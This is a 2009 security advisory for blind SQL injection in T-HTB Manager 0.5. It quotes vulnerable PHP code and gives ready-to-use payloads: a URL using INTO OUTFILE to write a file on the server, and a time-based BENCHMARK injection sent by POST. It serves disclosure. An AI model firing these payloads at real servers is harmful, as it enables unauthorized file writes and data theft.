T-HTB Manager 0.5 Blind SQL Injection

2009-09-10T00:00:00
ID PACKETSTORM:81164
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-09-10T00:00:00

Description

                                        
                                            `******** Salvatore "drosophila" Fresta ********  
  
[+] Application: T-HTB Manager  
[+] Version: 0.5  
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page  
  
[+] Bugs: [A] Multiple Blind SQL Injection  
  
[+] Exploitation: Remote  
[+] Date: 10 Sep 2009  
  
[+] Discovered by: Salvatore Fresta aka drosophila  
[+] Author: Salvatore Fresta aka drosophila  
[+] E-mail: drosophilaxxx [at] gmail.com  
  
  
***************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
***************************************************  
  
[+] Bugs  
  
  
- [A] Multiple Blind SQL Injection  
  
[-] Risk: medium  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: index.php  
  
All fields in this script are not sanitized but any  
outputs aren't returned.  
  
...  
  
case 'delete_category':  
$id = $_GET['id'];  
$id_interfaces = $_GET['id_interfaces'];  
  
if($id>0)  
{  
$query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";  
$db_query = mysql_query($query);  
  
...  
  
case 'update_category':  
$name = $_POST['name'];  
$id = $_POST['id'];  
  
$rate = $_POST['rate'];  
$ceil = $_POST['ceil'];  
$burst = $_POST['burst'];  
$prio = $_POST['prio'];  
$monitor = $_POST['monitor'];  
  
if(strlen($name)>0 && $id>0)  
{  
$nodelft = $_POST['nodelft'];  
  
$lft = $_POST['lft'];  
$rgt = $_POST['rgt'];  
  
$query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";  
  
...  
  
And many others..  
  
  
***************************************************  
  
[+] Code  
  
  
- [A] Multiple Blind SQL Injection  
  
This is a Blind SQL Injection bug but into the  
database there aren't very reserved information  
such as usernames and/or passwords. However this  
injection can be used to write arbitrary files  
on the server (when allowed).  
  
http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php  
  
Send it as a POST packet:  
  
action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23  
  
  
***************************************************  
  
[+] Fix  
  
No fix.  
  
  
***************************************************`